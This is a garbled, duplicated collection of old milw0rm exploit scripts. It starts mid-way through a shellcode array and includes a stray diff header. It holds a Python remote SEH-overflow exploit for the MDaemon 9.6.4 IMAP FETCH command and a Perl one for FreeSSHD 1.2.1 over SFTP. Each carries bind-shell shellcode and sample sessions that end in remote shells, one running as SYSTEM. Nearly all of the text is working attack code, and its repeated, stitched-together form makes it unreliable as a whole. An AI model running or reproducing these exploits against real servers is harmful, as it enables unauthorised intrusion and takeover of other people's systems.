"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6"
"\xff\xd0"
)
s = socket(AF_INET, SOCK_STREAM)
print " [+] Connecting to imap server..."
s.connect((HOST, PORT))
print s.recv(1024)
print " [+] Logging in..."
s.send("0001 LOGIN %s %s\r\n" % (USER, PASSWD))
print s.recv(1024)
print " [+] Selecting Inbox Folder..."
s.send("0002 SELECT Inbox\r\n")
print s.recv(1024)
print " [+] We need at least one message in Inbox, appending one..."
s.send('0003 APPEND Inbox {1}\r\n')
print s.recv(1024)
print " [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?"
s.send('SPAGHETTI AND PWNSAUCE\r\n')
print s.recv(1024)
print " [+] DINNER'S READY: Sending Evil Buffer..."
# Seh overwrite at 532 Bytes
# pop edi; pop ebp; ret; From mdaemon/HashCash.dll
EVIL = "A"*528 + "\xEB\x06\x90\x90" + "\x8b\x11\xdc\x64" + "\x90"*8 + shellcode + 'C'*35
s.send("A654 FETCH 2:4 (FLAGS BODY[" + EVIL + " (DATE FROM)])\r\n")
s.close()
print " [+] DONE! Check your shell on %s:%d" % (HOST, 4444)
# milw0rm.com [2008-03-13]
#!/usr/bin/python
###############################################################################
#
# MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND UNIVERSAL EXPLOIT 0day
# Bug discovered and coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : MDaemon IMAP server v9.6.4
# Tested on OS : Windows 2000 SP4 English
# Windows XP Sp2 English
# Windows 2003 Standard Edition Italian
# Discovery Date : 03/13/2008
#
#-----------------------------------------------------------------------------
#
# muts AS YOU CAN SEE, I ALWAYS MAINTAIN MY PROMISES! LOL
#
# Thx to Silvia for feeding my obsessions
# Thx to didNot at #offsec
# (yes he doesn't look like Silvia but he's a nice guy LOL)
# and to www.offensive-security.com
#
#-----------------------------------------------------------------------------
##############################################################################
# [+] Connecting to imap server...
# * OK test.local IMAP4rev1 MDaemon 9.6.4 ready
#
# [+] Logging in...
# 0001 OK LOGIN completed
#
# [+] Selecting Inbox Folder...
# * FLAGS (\Seen \Answered \Flagged \Deleted \Draft \Recent)
# * 16 EXISTS
# * 16 RECENT
# * OK [UNSEEN 1] first unseen
# * OK [UIDVALIDITY 1205411202] UIDs valid
# * OK [UIDNEXT 17] Predicted next UID
# * OK [PERMANENTFLAGS (\Seen \Answered \Flagged \Deleted \Draft)] .
# 0002 OK [READ-WRITE] SELECT completed
#
# [+] We need at least one message in Inbox, appending one...
# + Ready for append literal
#
# [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?
# * 17 EXISTS
# * 17 RECENT
# 0003 OK [APPENDUID 1205411202 17] APPEND completed
#
# [+] DINNER'S READY: Sending Evil Buffer...
# [+] DONE! Check your shell on 192.168.1.195:4444
#
#
# matte@badrobot:~$ nc 192.168.1.195 4444
# (UNKNOWN) [192.168.1.195] 4444 (?) : Connection refused
# matte@badrobot:~$ nc 192.168.1.195 4444
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\MDaemon\APP>whoami
# whoami
# NT AUTHORITY\SYSTEM
#
# C:\MDaemon\APP>
##############################################################################
from socket import *
from optparse import OptionParser
import sys, time
print "[*********************************************************************]"
print "[* *]"
print "[* MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND EXPLOIT *]"
print "[* DISCOVERED AND CODED *]"
print "[* by *]"
print "[* MATTEO MEMELLI *]"
print "[* (ryujin) *]"
print "[* www.be4mind.com - www.gray-world.net *]"
print "[* *]"
print "[*********************************************************************]"
usage = "%prog -H TARGET_HOST -P TARGET_PORT -l USER -p PASSWD"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
parser.add_option("-l", "--login-user", type="string",
action="store", dest="USER",
help="User login")
parser.add_option("-p", "--login-password", type="string",
action="store", dest="PASSWD",
help="User password")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
USER = options.USER
PASSWD = options.PASSWD
if not (HOST and PORT and USER and PASSWD):
parser.print_help()
sys.exit()
# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444
shellcode = (
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6"
"\xff\xd0"
)
s = socket(AF_INET, SOCK_STREAM)
print " [+] Connecting to imap server..."
s.connect((HOST, PORT))
print s.recv(1024)
print " [+] Logging in..."
s.send("0001 LOGIN %s %s\r\n" % (USER, PASSWD))
print s.recv(1024)
print " [+] Selecting Inbox Folder..."
s.send("0002 SELECT Inbox\r\n")
print s.recv(1024)
print " [+] We need at least one message in Inbox, appending one..."
s.send('0003 APPEND Inbox {1}\r\n')
print s.recv(1024)
print " [+] What would you like for dinner? SPAGHETTI AND PWNSAUCE?"
s.send('SPAGHETTI AND PWNSAUCE\r\n')
print s.recv(1024)
print " [+] DINNER'S READY: Sending Evil Buffer..."
# Seh overwrite at 532 Bytes
# pop edi; pop ebp; ret; From mdaemon/HashCash.dll
EVIL = "A"*528 + "\xEB\x06\x90\x90" + "\x8b\x11\xdc\x64" + "\x90"*8 + shellcode + 'C'*35
s.send("A654 FETCH 2:4 (FLAGS BODY[" + EVIL + " (DATE FROM)])\r\n")
s.close()
print " [+] DONE! Check your shell on %s:%d" % (HOST, 4444)
# milw0rm.com [2008-03-13]


@ -1,143 +1,143 @@
#!/usr/bin/perl
###############################################################################
# FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow http://freeddsshd.com/ #
# Exploit based on securfrog Poc http://www.milw0rm.com/exploits/5709 #
# #
# Coded by Matteo Memelli aka ryujin #
# `Spaghetti & PwnSauce` #
# >> http://www.be4mind.com http://www.gray-world.net << #
# #
# Tested on Windows XPSp2 EN / Windows Vista Ultimate EN #
# Offset for SEH overwrite is 3 Bytes greater in Windows Vista #
# Reliable Exploitation needs SSC :) #
# #
# `I Miss Python but...I Gotta learn some perl too ;)` #
# `Cheers to #offsec friends and to my bro s4tan` #
###############################################################################
# #
# bt POCS # ./freeSSHD_exploit.pl 10.150.0.228 22 pwnme pwnme 2 #
# [+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow #
# [+] Coded by Matteo Memelli aka ryujin #
# [+] SSC: Stack Spring Cleaning... >> rm thisJunk << #
# [+] Exploiting FreSSHDService... #
# [+] Sending Payload... #
# [*] Done! CTRL-C and check your shell on port 4444 #
# #
# bt POCS # nc 10.150.0.228 4444 #
# Microsoft Windows [Version 6.0.6000] #
# Copyright (c) 2006 Microsoft Corporation. All rights reserved. #
# #
# C:\Users\ryujin\Desktop> #
# #
###############################################################################
use strict;
use Net::SSH2;
my $numArgs = $#ARGV + 1;
if ($numArgs != 5) {
print "Usage : ./freeSSHD_exploit.pl HOST PORT USER PASS TARGET\n";
print "TARGET: 1 -> XPSP2\n";
print "TARGET: 2 -> VISTA\n";
exit;
}
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# ExitFunc=SEH
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e".
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48".
"\x4e\x56\x46\x42\x46\x32\x4b\x38\x45\x44\x4e\x33\x4b\x48\x4e\x47".
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x58".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x33\x4b\x38".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x4a\x42\x45\x37\x45\x4e\x4b\x48".
"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x48\x4e\x50\x4b\x34".
"\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x58".
"\x49\x48\x4e\x46\x46\x32\x4e\x41\x41\x36\x43\x4c\x41\x53\x4b\x4d".
"\x46\x56\x4b\x48\x43\x34\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x48".
"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50\x50\x45\x4a\x36".
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".
"\x43\x35\x48\x46\x4a\x46\x43\x43\x44\x53\x4a\x46\x47\x57\x43\x37".
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x43\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e".
"\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x55\x4c\x36\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
"\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x45\x43\x35\x43\x35\x43\x54".
"\x43\x35\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x31".
"\x4e\x35\x48\x56\x43\x35\x49\x48\x41\x4e\x45\x39\x4a\x36\x46\x4a".
"\x4c\x51\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x36\x42\x31".
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32".
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d".
"\x4a\x56\x45\x4e\x49\x34\x48\x58\x49\x54\x47\x35\x4f\x4f\x48\x4d".
"\x42\x45\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46".
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x36\x43\x56".
"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x32\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x38\x44\x4e\x41\x33\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x44\x4e\x52".
"\x43\x39\x4d\x58\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
"\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x37\x46\x54\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x45\x41\x55\x41\x35\x4c\x46".
"\x41\x50\x41\x35\x41\x35\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x36".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d".
"\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";
my $nops = "\x90"x64;
my $offset1xp = "\x41"x242;
my $offset1vi = "\x41"x226;
my $offset2xp = "\x41"x24;
my $offset2vi = "\x41"x43;
my $ppr = "\xde\x13\x40";
my $jmpsxp = "\xeb\xe1\x90\x90";
my $jmpsvi = "\xeb\xce\x90\x90";
my $jmpn = "\xe9\x23\xfc\xff\xff";
my $ip = $ARGV[0];
my $port = int($ARGV[1]);
my $user = $ARGV[2];
my $pass = $ARGV[3];
my $payload = '';
if ($ARGV[4] == '1')
{
$payload = $nops.$shellcode.$offset1xp.$jmpn.$offset2xp.$jmpsxp.$ppr;
}
elsif ($ARGV[4] == '2')
{
$payload = $nops.$shellcode.$offset1vi.$jmpn.$offset2vi.$jmpsvi.$ppr;
}
else
{
print "[-] TARGET ERROR!\n";
exit;
}
print "[+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow\n";
print "[+] Coded by Matteo Memelli aka ryujin\n";
print "[+] SSC: Stack Spring Cleaning... >> rm thisJunk <<\n";
# If you start the exploit before any other connection, everything is fine
# otherwise exploit could become less reliable.
# So let's rm some junk before exploiting our app...
for (my $count = 30; $count >= 1; $count--) {
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
$ssh2->disconnect();
}
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
print "[+] Exploiting FreSSHDService...\n";
print "[+] Sending Payload...\n";
print "[*] Done! CTRL-C and check your shell on port 4444\n";
my $sftp = $ssh2->sftp();
my $bad = $sftp->opendir($payload);
exit;
# milw0rm.com [2008-06-06]
#!/usr/bin/perl
###############################################################################
# FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow http://freeddsshd.com/ #
# Exploit based on securfrog Poc http://www.milw0rm.com/exploits/5709 #
# #
# Coded by Matteo Memelli aka ryujin #
# `Spaghetti & PwnSauce` #
# >> http://www.be4mind.com http://www.gray-world.net << #
# #
# Tested on Windows XPSp2 EN / Windows Vista Ultimate EN #
# Offset for SEH overwrite is 3 Bytes greater in Windows Vista #
# Reliable Exploitation needs SSC :) #
# #
# `I Miss Python but...I Gotta learn some perl too ;)` #
# `Cheers to #offsec friends and to my bro s4tan` #
###############################################################################
# #
# bt POCS # ./freeSSHD_exploit.pl 10.150.0.228 22 pwnme pwnme 2 #
# [+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow #
# [+] Coded by Matteo Memelli aka ryujin #
# [+] SSC: Stack Spring Cleaning... >> rm thisJunk << #
# [+] Exploiting FreSSHDService... #
# [+] Sending Payload... #
# [*] Done! CTRL-C and check your shell on port 4444 #
# #
# bt POCS # nc 10.150.0.228 4444 #
# Microsoft Windows [Version 6.0.6000] #
# Copyright (c) 2006 Microsoft Corporation. All rights reserved. #
# #
# C:\Users\ryujin\Desktop> #
# #
###############################################################################
use strict;
use Net::SSH2;
my $numArgs = $#ARGV + 1;
if ($numArgs != 5) {
print "Usage : ./freeSSHD_exploit.pl HOST PORT USER PASS TARGET\n";
print "TARGET: 1 -> XPSP2\n";
print "TARGET: 2 -> VISTA\n";
exit;
}
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# ExitFunc=SEH
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e".
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48".
"\x4e\x56\x46\x42\x46\x32\x4b\x38\x45\x44\x4e\x33\x4b\x48\x4e\x47".
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x58".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x33\x4b\x38".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x4a\x42\x45\x37\x45\x4e\x4b\x48".
"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x48\x4e\x50\x4b\x34".
"\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x58".
"\x49\x48\x4e\x46\x46\x32\x4e\x41\x41\x36\x43\x4c\x41\x53\x4b\x4d".
"\x46\x56\x4b\x48\x43\x34\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x48".
"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50\x50\x45\x4a\x36".
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".
"\x43\x35\x48\x46\x4a\x46\x43\x43\x44\x53\x4a\x46\x47\x57\x43\x37".
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x43\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e".
"\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x55\x4c\x36\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
"\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x45\x43\x35\x43\x35\x43\x54".
"\x43\x35\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x31".
"\x4e\x35\x48\x56\x43\x35\x49\x48\x41\x4e\x45\x39\x4a\x36\x46\x4a".
"\x4c\x51\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x36\x42\x31".
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32".
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d".
"\x4a\x56\x45\x4e\x49\x34\x48\x58\x49\x54\x47\x35\x4f\x4f\x48\x4d".
"\x42\x45\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46".
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x36\x43\x56".
"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x32\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x38\x44\x4e\x41\x33\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x44\x4e\x52".
"\x43\x39\x4d\x58\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
"\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x37\x46\x54\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x45\x41\x55\x41\x35\x4c\x46".
"\x41\x50\x41\x35\x41\x35\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x36".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d".
"\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";
my $nops = "\x90"x64;
my $offset1xp = "\x41"x242;
my $offset1vi = "\x41"x226;
my $offset2xp = "\x41"x24;
my $offset2vi = "\x41"x43;
my $ppr = "\xde\x13\x40";
my $jmpsxp = "\xeb\xe1\x90\x90";
my $jmpsvi = "\xeb\xce\x90\x90";
my $jmpn = "\xe9\x23\xfc\xff\xff";
my $ip = $ARGV[0];
my $port = int($ARGV[1]);
my $user = $ARGV[2];
my $pass = $ARGV[3];
my $payload = '';
if ($ARGV[4] == '1')
{
$payload = $nops.$shellcode.$offset1xp.$jmpn.$offset2xp.$jmpsxp.$ppr;
}
elsif ($ARGV[4] == '2')
{
$payload = $nops.$shellcode.$offset1vi.$jmpn.$offset2vi.$jmpsvi.$ppr;
}
else
{
print "[-] TARGET ERROR!\n";
exit;
}
print "[+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow\n";
print "[+] Coded by Matteo Memelli aka ryujin\n";
print "[+] SSC: Stack Spring Cleaning... >> rm thisJunk <<\n";
# If you start the exploit before any other connection, everything is fine
# otherwise exploit could become less reliable.
# So let's rm some junk before exploiting our app...
for (my $count = 30; $count >= 1; $count--) {
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
$ssh2->disconnect();
}
my $ssh2 = Net::SSH2->new();
$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
print "[+] Exploiting FreSSHDService...\n";
print "[+] Sending Payload...\n";
print "[*] Done! CTRL-C and check your shell on port 4444\n";
my $sftp = $ssh2->sftp();
my $bad = $sftp->opendir($payload);
exit;
# milw0rm.com [2008-06-06]